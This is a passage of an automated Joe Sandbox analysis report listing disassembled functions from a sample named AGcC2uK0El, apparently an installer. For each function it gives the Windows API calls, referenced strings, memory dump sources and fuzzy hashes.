                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$InfoRegisterUnregister
                                                                                    • String ID: @
                                                                                    • API String ID: 3749476976-2766056989
                                                                                    • Opcode ID: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                    • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                                    • Opcode Fuzzy Hash: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                    • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                                    APIs
                                                                                    • 74D31520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                                    • 74D31500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                                    • 74D31540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: D31500D31520D31540
                                                                                    • String ID: j]I
                                                                                    • API String ID: 1003763464-3121892809
                                                                                    • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                    • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                                    • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                    • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastProcess
                                                                                    • String ID: XtE$ptE
                                                                                    • API String ID: 2919029540-3149052308
                                                                                    • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                    • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                                    • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                    • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                                    APIs
                                                                                    • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                      • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                      • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                      • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                    • API String ID: 395431579-1506664499
                                                                                    • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                    • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                                    • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                                    • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                                    Strings
                                                                                    • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                                    • PendingFileRenameOperations, xrefs: 00454F5C
                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                    • API String ID: 47109696-2115312317
                                                                                    • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                    • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                                    • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                                    • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                                    APIs
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
                                                                                    • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
                                                                                    • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                    • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                                    • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                                    • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                                    APIs
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                                    • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                                    • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                    • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                                    • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                                    • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                                    APIs
                                                                                    • GetMenu.USER32(00000000), ref: 00421371
                                                                                    • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu
                                                                                    • String ID:
                                                                                    • API String ID: 3711407533-0
                                                                                    • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                    • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                                    • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                                    • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$CallMessageProcSendTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 601730667-0
                                                                                    • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                    • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                    • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                    • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                    APIs
                                                                                    • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                    • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                    • String ID:
                                                                                    • API String ID: 4071923889-0
                                                                                    • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                    • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                                    • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                                    • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                    • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                    • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A14620A480A570EnumFonts
                                                                                    • String ID:
                                                                                    • API String ID: 2780753366-0
                                                                                    • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                    • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                    • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                    • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                    APIs
                                                                                      • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                    • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                                    Strings
                                                                                    • EndOffset range exceeded, xrefs: 0045BAED
                                                                                    • NumRecs range exceeded, xrefs: 0045BAB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlush
                                                                                    • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                    • API String ID: 3593489403-659731555
                                                                                    • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                    • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                                    • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                                    • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                                    APIs
                                                                                      • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                                      • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                                      • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                      • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                      • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                      • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                      • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                      • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049708E), ref: 00409B88
                                                                                      • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                      • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                                      • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                      • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                      • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                                      • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                      • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                      • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                      • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                      • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                      • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                      • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                      • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                      • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                      • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                      • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                      • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                                      • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                      • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                      • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                      • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                                      • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                    • String ID: Setup
                                                                                    • API String ID: 291738113-3839654196
                                                                                    • Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                    • Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
                                                                                    • Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                                    • Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                    • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A15940CurrentThread
                                                                                    • String ID: RzE
